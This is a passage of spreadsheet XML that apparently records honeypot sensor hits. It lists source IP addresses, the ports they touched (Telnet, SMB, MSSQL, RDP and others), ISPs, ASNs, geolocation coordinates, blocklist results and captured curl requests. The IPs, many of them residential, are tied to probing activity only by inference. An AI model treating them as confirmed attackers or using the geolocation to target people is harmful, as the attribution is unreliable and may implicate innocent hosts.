    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IPP_H31&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_SIP_H4&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;25819&amp;&amp;631&amp;&amp;5900&amp;&amp;9100&amp;&amp;5432&amp;&amp;1080&amp;&amp;445&amp;&amp;3389&amp;&amp;443&amp;&amp;5060&amp;&amp;52887&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:ca8c:830d</t>
  </si>
  <si>
    <t>6294cda91890aa575972766c7feebe85</t>
  </si>
  <si>
    <t>117.204.21.169</t>
  </si>
  <si>
    <t>::ffff:75cc:15a9</t>
  </si>
  <si>
    <t>9821d368b346765d27b7f475d1f9eeaf</t>
  </si>
  <si>
    <t>220.255.250.215</t>
  </si>
  <si>
    <t>NA&amp;&amp;bb220-255-250-215.singnet.com.sg</t>
  </si>
  <si>
    <t>SingNet Pte Ltd</t>
  </si>
  <si>
    <t>2003-06-24</t>
  </si>
  <si>
    <t>SINGNET-SG</t>
  </si>
  <si>
    <t>1995-06-14 16:00:00</t>
  </si>
  <si>
    <t>2025-06-14 16:00:00</t>
  </si>
  <si>
    <t>2024-07-14 16:02:49</t>
  </si>
  <si>
    <t>['ns1.singnet.com.sg', 'ns2.singnet.com.sg']</t>
  </si>
  <si>
    <t>Singnet Pte Ltd</t>
  </si>
  <si>
    <t>::ffff:dcff:fad7</t>
  </si>
  <si>
    <t>e54d53e85f754edc91fc65eb05580526</t>
  </si>
  <si>
    <t>103.138.1.43</t>
  </si>
  <si>
    <t>Anakapalli</t>
  </si>
  <si>
    <t>Anakapalle</t>
  </si>
  <si>
    <t>1278688</t>
  </si>
  <si>
    <t>17.6913</t>
  </si>
  <si>
    <t>83.004</t>
  </si>
  <si>
    <t>138752</t>
  </si>
  <si>
    <t>Starone Broadband Private Limited</t>
  </si>
  <si>
    <t>2019-04-08</t>
  </si>
  <si>
    <t>SOBPL</t>
  </si>
  <si>
    <t>::ffff:678a:12b</t>
  </si>
  <si>
    <t>840fbda197e75e6ec1e1cdb61a001b8c</t>
  </si>
  <si>
    <t>125.228.31.29</t>
  </si>
  <si>
    <t>125-228-31-29.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;445&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;389&amp;&amp;9100&amp;&amp;39299&amp;&amp;42357&amp;&amp;63654&amp;&amp;42413&amp;&amp;42374</t>
  </si>
  <si>
    <t>::ffff:7de4:1f1d</t>
  </si>
  <si>
    <t>0d04dc379fc37710aba4066f034a678a</t>
  </si>
  <si>
    <t>117.219.70.76</t>
  </si>
  <si>
    <t>::ffff:75db:464c</t>
  </si>
  <si>
    <t>dce7438f00bf7731dc254800c7ce505b</t>
  </si>
  <si>
    <t>117.217.93.130</t>
  </si>
  <si>
    <t>::ffff:75d9:5d82</t>
  </si>
  <si>
    <t>5a8e72cc105d84708783f3dd25f09e7b</t>
  </si>
  <si>
    <t>117.208.213.8</t>
  </si>
  <si>
    <t>::ffff:75d0:d508</t>
  </si>
  <si>
    <t>655d152b5dd8768c412e05cf25acbf32</t>
  </si>
  <si>
    <t>103.80.116.107</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>21500&amp;&amp;1433</t>
  </si>
  <si>
    <t>New Delhi (Pocket HL)</t>
  </si>
  <si>
    <t>28.6252</t>
  </si>
  <si>
    <t>77.1037</t>
  </si>
  <si>
    <t>135834</t>
  </si>
  <si>
    <t>Multicraft Digital Technologies Private Limited</t>
  </si>
  <si>
    <t>2016-11-29</t>
  </si>
  <si>
    <t>MULTIFI</t>
  </si>
  <si>
    <t>::ffff:6750:746b</t>
  </si>
  <si>
    <t>7f71320301c87dffa4a7c5c0cc9a8c23</t>
  </si>
  <si>
    <t>147.185.133.69</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_POSTGRES_H33&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H39&amp;&amp;SMA-LAB_SMTP_H33&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;51381&amp;&amp;45584&amp;&amp;6667&amp;&amp;80&amp;&amp;5432&amp;&amp;5900&amp;&amp;443&amp;&amp;25&amp;&amp;53137&amp;&amp;50930</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': '', 'data': 'None'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:93b9:8545</t>
  </si>
  <si>
    <t>c27e05dfe460ac95cc79d0312314cf27</t>
  </si>
  <si>
    <t>14.237.224.45</t>
  </si>
  <si>
    <t>::ffff:eed:e02d</t>
  </si>
  <si>
    <t>74694815dd289ddeb3deea74d84503fb</t>
  </si>
  <si>
    <t>171.96.203.165</t>
  </si>
  <si>
    <t>ppp-171-96-203-165.revip8.asianet.co.th&amp;&amp;NA</t>
  </si>
  <si>
    <t>Truenet Hisp</t>
  </si>
  <si>
    <t>TRUENET-HISP</t>
  </si>
  <si>
    <t>::ffff:ab60:cba5</t>
  </si>
  <si>
    <t>5a82d8f980c1255d828b3f4230e9ee4b</t>
  </si>
  <si>
    <t>181.102.104.164</t>
  </si>
  <si>
    <t>Salta</t>
  </si>
  <si>
    <t>Departamento de Orán</t>
  </si>
  <si>
    <t>Orán</t>
  </si>
  <si>
    <t>3836620</t>
  </si>
  <si>
    <t>-23.1371</t>
  </si>
  <si>
    <t>-64.3243</t>
  </si>
  <si>
    <t>Telecom Personal Bs</t>
  </si>
  <si>
    <t>::ffff:b566:68a4</t>
  </si>
  <si>
    <t>7cc15a3ee0aafccaf3a50ec54a025f90</t>
  </si>
  <si>
    <t>37.243.248.237</t>
  </si>
  <si>
    <t>Jazan Region</t>
  </si>
  <si>
    <t>Mizhirah</t>
  </si>
  <si>
    <t>410874</t>
  </si>
  <si>
    <t>16.8261</t>
  </si>
  <si>
    <t>42.7333</t>
  </si>
  <si>
    <t>Internet Broadband</t>
  </si>
  <si>
    <t>::ffff:25f3:f8ed</t>
  </si>
  <si>
    <t>bde82bfae267863cc9f7ff71f31025f9</t>
  </si>
  <si>
    <t>120.61.254.59</t>
  </si>
  <si>
    <t>::ffff:783d:fe3b</t>
  </si>
  <si>
    <t>dc8d007a457e6bcf06124efe0497d37a</t>
  </si>
  <si>
    <t>110.159.151.215</t>
  </si>
  <si>
    <t>::ffff:6e9f:97d7</t>
  </si>
  <si>
    <t>205aa1389e197c788facfb3d8530918f</t>
  </si>
  <si>
    <t>98.45.14.131</t>
  </si>
  <si>
    <t>Sonoma</t>
  </si>
  <si>
    <t>Windsor</t>
  </si>
  <si>
    <t>5410004</t>
  </si>
  <si>
    <t>95492</t>
  </si>
  <si>
    <t>38.5471</t>
  </si>
  <si>
    <t>-122.816</t>
  </si>
  <si>
    <t>COMCAST-VOIP-4</t>
  </si>
  <si>
    <t>::ffff:622d:e83</t>
  </si>
  <si>
    <t>5cd991c172c838d5112c1999d7608abe</t>
  </si>
  <si>
    <t>59.93.124.115</t>
  </si>
  <si>
    <t>::ffff:3b5d:7c73</t>
  </si>
  <si>
    <t>a8e716eb35467088e39aed4cfcd6e646</t>
  </si>
  <si>
    <t>117.255.176.120</t>
  </si>
  <si>
    <t>::ffff:75ff:b078</t>
  </si>
  <si>
    <t>30ea6a582e7d98f68057bb1d5124d5b2</t>
  </si>
  <si>
    <t>81.149.118.126</t>
  </si>
  <si>
    <t>host81-149-118-126.in-addr.btopenworld.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;22828&amp;&amp;23&amp;&amp;NA&amp;&amp;80</t>
  </si>
  <si>
    <t>West Northamptonshire</t>
  </si>
  <si>
    <t>Northampton</t>
  </si>
  <si>
    <t>2641430</t>
  </si>
  <si>
    <t>52.25</t>
  </si>
  <si>
    <t>-0.8833300000000001</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:5195:767e</t>
  </si>
  <si>
    <t>132c5e5368553920b15412138832b2da</t>
  </si>
  <si>
    <t>117.243.194.34</t>
  </si>
  <si>
    <t>::ffff:75f3:c222</t>
  </si>
  <si>
    <t>79cf127fff03666dff34ecd611fc5b6c</t>
  </si>
  <si>
    <t>59.93.111.58</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_DHCP_H15</t>
  </si>
  <si>
    <t>::ffff:3b5d:6f3a</t>
  </si>
  <si>
    <t>10f8f174a7e390fa11b0361c76e82cc8</t>
  </si>
  <si>
    <t>27.147.219.58</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H38&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H33</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;56314</t>
  </si>
  <si>
    <t>23.7104</t>
  </si>
  <si>
    <t>90.4074</t>
  </si>
  <si>
    <t>2010-03-31</t>
  </si>
  <si>
    <t>Corporate-Subscriber</t>
  </si>
  <si>
    <t>::ffff:1b93:db3a</t>
  </si>
  <si>
    <t>1ccaa958ec8c54533155c221efcfd91d</t>
  </si>
  <si>
    <t>1.172.6.127</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-172-6-127.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>Penghu County</t>
  </si>
  <si>
    <t>Magong</t>
  </si>
  <si>
    <t>1672228</t>
  </si>
  <si>
    <t>23.5654</t>
  </si>
  <si>
    <t>119.586</t>
  </si>
  <si>
    <t>::ffff:1ac:67f</t>
  </si>
  <si>
    <t>a63f9cdead34123b90dcbb0f9da9f7e3</t>
  </si>
  <si>
    <t>122.169.253.144</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>45298&amp;&amp;1433</t>
  </si>
  <si>
    <t>Hyderabad (MLA Colony)</t>
  </si>
  <si>
    <t>17.4061</t>
  </si>
  <si>
    <t>78.4312</t>
  </si>
  <si>
    <t>ABTS AP</t>
  </si>
  <si>
    <t>ABTS-AP-DSL-122892-hyd</t>
  </si>
  <si>
    <t>::ffff:7aa9:fd90</t>
  </si>
  <si>
    <t>2d6e4f43464ffc04677e9b9e79408b45</t>
  </si>
  <si>
    <t>45.164.176.252</t>
  </si>
  <si>
    <t>11680-000</t>
  </si>
  <si>
    <t>-23.4338</t>
  </si>
  <si>
    <t>-45.086</t>
  </si>
  <si>
    <t>::ffff:2da4:b0fc</t>
  </si>
  <si>
    <t>6a821ab85314d3cc4d297c67b54ae10b</t>
  </si>
  <si>
    <t>117.192.131.42</t>
  </si>
  <si>
    <t>::ffff:75c0:832a</t>
  </si>
  <si>
    <t>59ed2db4d9a83e6027560ab57f406b86</t>
  </si>
  <si>
    <t>220.137.214.100</t>
  </si>
  <si>
    <t>220-137-214-100.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:dc89:d664</t>
  </si>
  <si>
    <t>86712cc76f6e15e09b660cc68f2cf8bc</t>
  </si>
  <si>
    <t>61.1.63.94</t>
  </si>
  <si>
    <t>::ffff:3d01:3f5e</t>
  </si>
  <si>
    <t>cb098fd34571c1aa91db9b6ffbedf29e</t>
  </si>
  <si>
    <t>61.2.94.121</t>
  </si>
  <si>
    <t>::ffff:3d02:5e79</t>
  </si>
  <si>
    <t>9a0061eb3159785bd8566d8fc3db5f71</t>
  </si>
  <si>
    <t>117.207.41.68</t>
  </si>
  <si>
    <t>::ffff:75cf:2944</t>
  </si>
  <si>
    <t>c43e05db9214d43983038c8415cbccd1</t>
  </si>
  <si>
    <t>120.61.93.223</t>
  </si>
  <si>
    <t>::ffff:783d:5ddf</t>
  </si>
  <si>
    <t>7a5fc2a221fe1e7c33cdd7008e7dc79b</t>
  </si>
  <si>
    <t>59.93.141.68</t>
  </si>
  <si>
    <t>::ffff:3b5d:8d44</t>
  </si>
  <si>
    <t>11f1df192f824bd037ba3e4d1aadadae</t>
  </si>
  <si>
    <t>125.228.115.91</t>
  </si>
  <si>
    <t>125-228-115-91.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7de4:735b</t>
  </si>
  <si>
    <t>6315890958b30d04146226faee5b1270</t>
  </si>
  <si>
    <t>117.219.164.110</t>
  </si>
  <si>
    <t>::ffff:75db:a46e</t>
  </si>
  <si>
    <t>794f9e84071e8e3502cab0202f7bc600</t>
  </si>
  <si>
    <t>117.195.215.244</t>
  </si>
  <si>
    <t>::ffff:75c3:d7f4</t>
  </si>
  <si>
    <t>83fddefca11550dc26ee4783d65e98a5</t>
  </si>
  <si>
    <t>182.78.46.78</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306&amp;&amp;445&amp;&amp;59275&amp;&amp;59268</t>
  </si>
  <si>
    <t>Chitradurga</t>
  </si>
  <si>
    <t>Khandenahalli</t>
  </si>
  <si>
    <t>10884578</t>
  </si>
  <si>
    <t>577596</t>
  </si>
  <si>
    <t>14.0373</t>
  </si>
  <si>
    <t>76.8029</t>
  </si>
  <si>
    <t>XREC-4489106-CHITRADURGA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (182.78.46.78,60988)}&amp;&amp;{Data_SMB:Incoming connection (182.78.46.78,57906)}</t>
  </si>
  <si>
    <t>::ffff:b64e:2e4e</t>
  </si>
  <si>
    <t>412109ad3f9589996946494cfd18ee3e</t>
  </si>
  <si>
    <t>37.36.87.37</t>
  </si>
  <si>
    <t>::ffff:2524:5725</t>
  </si>
  <si>
    <t>ee7cc7412179b26e671fcdf2ca97e45d</t>
  </si>
  <si>
    <t>182.57.212.167</t>
  </si>
  <si>
    <t>::ffff:b639:d4a7</t>
  </si>
  <si>
    <t>4d898be0fb43de5f265dac5240203b5e</t>
  </si>
  <si>
    <t>125.137.90.45</t>
  </si>
  <si>
    <t>Suseong-gu</t>
  </si>
  <si>
    <t>Beomeo-dong</t>
  </si>
  <si>
    <t>8692109</t>
  </si>
  <si>
    <t>35.8578</t>
  </si>
  <si>
    <t>128.631</t>
  </si>
  <si>
    <t>::ffff:7d89:5a2d</t>
  </si>
  <si>
    <t>a7109de713b116071d4c93bd3688abfb</t>
  </si>
  <si>
    <t>59.93.139.158</t>
  </si>
  <si>
    <t>::ffff:3b5d:8b9e</t>
  </si>
  <si>
    <t>d4b669731305982f43469d21eb1fc109</t>
  </si>
  <si>
    <t>49.43.233.124</t>
  </si>
  <si>
    <t>Krishna</t>
  </si>
  <si>
    <t>Kānūru</t>
  </si>
  <si>
    <t>10778953</t>
  </si>
  <si>
    <t>16.4985</t>
  </si>
  <si>
    <t>80.6914</t>
  </si>
  <si>
    <t>::ffff:312b:e97c</t>
  </si>
  <si>
    <t>bfd6bb51f891f221cea00c0f2610cee8</t>
  </si>
  <si>
    <t>125.229.240.71</t>
  </si>
  <si>
    <t>125-229-240-71.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;14707&amp;&amp;80&amp;&amp;18109&amp;&amp;23&amp;&amp;9100&amp;&amp;4949&amp;&amp;57389&amp;&amp;56209&amp;&amp;63839&amp;&amp;51694&amp;&amp;51720&amp;&amp;51732&amp;&amp;51745&amp;&amp;51763</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;GET&amp;&amp;login</t>
  </si>
  <si>
    <t>::ffff:7de5:f047</t>
  </si>
  <si>
    <t>b005cd52085c35270c686023fde5e67f</t>
  </si>
  <si>
    <t>43.225.189.185</t>
  </si>
  <si>
    <t>Hostroyale Technologies</t>
  </si>
  <si>
    <t>2014-12-09</t>
  </si>
  <si>
    <t>Hostroyale_Technologies</t>
  </si>
  <si>
    <t>::ffff:2be1:bdb9</t>
  </si>
  <si>
    <t>41963562fe6ddf99bdae3b7df3e76f48</t>
  </si>
  <si>
    <t>101.181.59.237</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>2010-12-23</t>
  </si>
  <si>
    <t>TELSTRAINTERNET50-AU</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:65b5:3bed</t>
  </si>
  <si>
    <t>79e9e8549425a01f25b57f651edf0251</t>
  </si>
  <si>
    <t>125.235.235.110</t>
  </si>
  <si>
    <t>{'b.barracudacentral.org': ['unknown']&amp;&amp; 'cbl.abuseat.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>::ffff:7deb:eb6e</t>
  </si>
  <si>
    <t>b8ff62cceeb01d3f684d2bd879cc113a</t>
  </si>
  <si>
    <t>61.3.55.231</t>
  </si>
  <si>
    <t>::ffff:3d03:37e7</t>
  </si>
  <si>
    <t>68d58a565a8368b367719eef2522d034</t>
  </si>
  <si>
    <t>175.137.162.135</t>
  </si>
  <si>
    <t>2010-01-08</t>
  </si>
  <si>
    <t>::ffff:af89:a287</t>
  </si>
  <si>
    <t>878222711293aeefb6f75f44cacc53a3</t>
  </si>
  <si>
    <t>122.117.94.206</t>
  </si>
  <si>
    <t>NA&amp;&amp;122-117-94-206.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;23&amp;&amp;28538&amp;&amp;50343&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7a75:5ece</t>
  </si>
  <si>
    <t>63a1071b7df0fece58581e110424a243</t>
  </si>
  <si>
    <t>220.134.4.19</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-4-19.hinet-ip.hinet.net</t>
  </si>
  <si>
